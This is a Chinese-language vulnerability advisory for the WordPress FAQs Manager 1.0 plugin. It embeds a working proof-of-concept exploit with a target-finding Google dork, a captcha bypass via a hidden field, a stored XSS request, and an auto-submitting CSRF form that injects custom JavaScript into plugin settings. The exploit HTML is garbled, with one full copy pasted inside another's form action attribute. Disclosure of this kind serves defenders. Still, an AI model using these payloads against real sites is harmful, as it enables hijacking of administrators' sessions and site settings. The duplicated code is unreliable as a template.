WordPress FAQs Manager 插件跨站脚本和跨站请求伪造漏洞

WordPress FAQs Manager 插件跨站脚本和跨站请求伪造漏洞

发布日期：2013-03-22
更新日期：2013-03-26

受影响系统：
WordPress FAQs Manager 1.0
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 58645
 
WordPress FAQs Manager是管理网站FAQ的插件。
 
FAQs Manager 1.0 及其他版本在IndiaNIC FAQ设置页面中存在跨站脚本和跨站请求伪造漏洞，攻击者可利用这些漏洞在question参数中插入alert(1)。Captcha值可以从captcha参数中读出。在受影响站点的用户浏览器中执行任意脚本代码，窃取cookie身份验证凭证，执行未授权操作，泄露和修改敏感信息。
 
<*来源：m3tamantra
  *>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
<html>
 <!--
 # Exploit Title: WordPress IndiaNIC FAQ 1.0 Plugin CSRF + XSS
 # Google Dork: inurl:wp-content/plugins/faqs-manager
 # Date: 21.03.2013
 # Exploit Author: m3tamantra (http://m3tamantra.wordpress.com/blog)
 # Vendor Homepage: http://wordpress.org/extend/plugins/faqs-manager/
 # Software Link: http://downloads.wordpress.org/plugin/faqs-manager.zip
 # Version: 1.0
 # Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli)

 ##############
 # Description:
 ##############
 # IndiaNIC FAQ Settings Page is vulnerable for CSRF.
 # The Ask Question area (front-end) is vulnerable for XSS. It is possible to insert <script>alert(1)</script> in question parameter.
 # The Captcha value can be read from captcha parameter (hidden field)
 #

 ###################################
 #### Part of Ask Question form ####
 ###################################
 <form action="" method="POST" name="iNICfaqsAskForm_1">
 <input type="hidden" value="1" name="group_id">
 <input type="hidden" value="1" name="from_user">
 <input type="hidden" value="inic_faq_questions" name="action">
 <input type="hidden" value="5540" name="captcha">  <=================== We don't need the captcha Image when we have this xD

 ####################################################################
 #### Request from Ask Question area (XSS in question parameter) ####
 ####################################################################
 POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
 Host: 127.0.0.1:9001
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:19.0) Gecko/20100101 Firefox/19.0
 Accept: application/json, text/javascript, */*; q=0.01
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 X-Requested-With: XMLHttpRequest
 Referer: http://www.example.com/wordpress/?p=11
 Content-Length: 143
 Connection: keep-alive
 Pragma: no-cache
 Cache-Control: no-cache

 group_id=1&from_user=1&action=inic_faq_questions&captcha=8560&who_asked=lalalallala%40gmail.com&question=XSS+TEST+<script>alert(1)</script>%3F&captcha_code=8560

 # When admin navigate to Question-Area (back-end) arbitrary JavaScript will execute.

 #######################################################################
 -->
    <title>
        #####################################################
        ############## IndiaNIC FAQ 1.0 CSRF ################
        #####################################################
    </title>
 <body>

    <!-- replace "http://www.example.com/wordpress" -->
    <form action="http://<html>
 <!--
 # Exploit Title: WordPress IndiaNIC FAQ 1.0 Plugin CSRF + XSS
 # Google Dork: inurl:wp-content/plugins/faqs-manager
 # Date: 21.03.2013
 # Exploit Author: m3tamantra (http://m3tamantra.wordpress.com/blog)
 # Vendor Homepage: http://wordpress.org/extend/plugins/faqs-manager/
 # Software Link: http://downloads.wordpress.org/plugin/faqs-manager.zip
 # Version: 1.0
 # Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli)

 ##############
 # Description:
 ##############
 # IndiaNIC FAQ Settings Page is vulnerable for CSRF.
 # The Ask Question area (front-end) is vulnerable for XSS. It is possible to insert <script>alert(1)</script> in question parameter.
 # The Captcha value can be read from captcha parameter (hidden field)
 #

 ###################################
 #### Part of Ask Question form ####
 ###################################
 <form action="" method="POST" name="iNICfaqsAskForm_1">
 <input type="hidden" value="1" name="group_id">
 <input type="hidden" value="1" name="from_user">
 <input type="hidden" value="inic_faq_questions" name="action">
 <input type="hidden" value="5540" name="captcha">  <=================== We don't need the captcha Image when we have this xD

 ####################################################################
 #### Request from Ask Question area (XSS in question parameter) ####
 ####################################################################
 POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
 Host: 127.0.0.1:9001
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:19.0) Gecko/20100101 Firefox/19.0
 Accept: application/json, text/javascript, */*; q=0.01
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 X-Requested-With: XMLHttpRequest
 Referer: http://www.example.com/wordpress/?p=11
 Content-Length: 143
 Connection: keep-alive
 Pragma: no-cache
 Cache-Control: no-cache

 group_id=1&from_user=1&action=inic_faq_questions&captcha=8560&who_asked=lalalallala%40gmail.com&question=XSS+TEST+<script>alert(1)</script>%3F&captcha_code=8560

 # When admin navigate to Question-Area (back-end) arbitrary JavaScript will execute.

 #######################################################################
 -->
    <title>
        #####################################################
        ############## IndiaNIC FAQ 1.0 CSRF ################
        #####################################################
    </title>
 <body>

    <!-- replace "http://www.example.com/wordpress" -->
    <form action="http://www.example.com/wordpress/wp-admin/admin-ajax.php" method="POST">
    <input type="hidden" name="action" value="inic_faq_settings" />
    <input type="hidden" name="alert_email_address" value="m3tamantra@127.0.0.1" />
    <input type="hidden" name="capture_email" value="1" />
    <input type="hidden" name="notify_when_answered" value="1" />
    <input type="hidden" name="listing_template" value="lalalalalalalalalalalalal" />
    <input type="hidden" name="custom_css" value="babaaaaaammmmmmmm" />
    <input type="hidden" name="custom_js" value="alert(1234)" />
    </form>
    <script>document.forms[0].submit();</script>

 </body>
 </html>/wordpress/wp-admin/admin-ajax.php" method="POST">
    <input type="hidden" name="action" value="inic_faq_settings" />
    <input type="hidden" name="alert_email_address" value="m3tamantra@127.0.0.1" />
    <input type="hidden" name="capture_email" value="1" />
    <input type="hidden" name="notify_when_answered" value="1" />
    <input type="hidden" name="listing_template" value="lalalalalalalalalalalalal" />
    <input type="hidden" name="custom_css" value="babaaaaaammmmmmmm" />
    <input type="hidden" name="custom_js" value="alert(1234)" />
    </form>
    <script>document.forms[0].submit();</script>

 </body>
 </html>

建议：
--------------------------------------------------------------------------------
厂商补丁：
 
WordPress
 ---------
 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
 
http://wordpress.org/extend/plugins/wordpress-faq-manager/